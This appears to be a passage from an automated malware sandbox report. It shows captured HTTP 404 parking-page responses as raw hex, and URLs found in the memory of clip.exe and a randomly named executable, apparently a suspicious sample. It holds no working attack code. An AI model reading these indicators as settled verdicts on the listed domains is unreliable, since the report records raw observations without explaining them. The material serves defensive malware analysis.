32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 14:55:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 14:55:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 14:55:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 04 Jul 2024 14:55:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Bfiworkerscomp.com
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
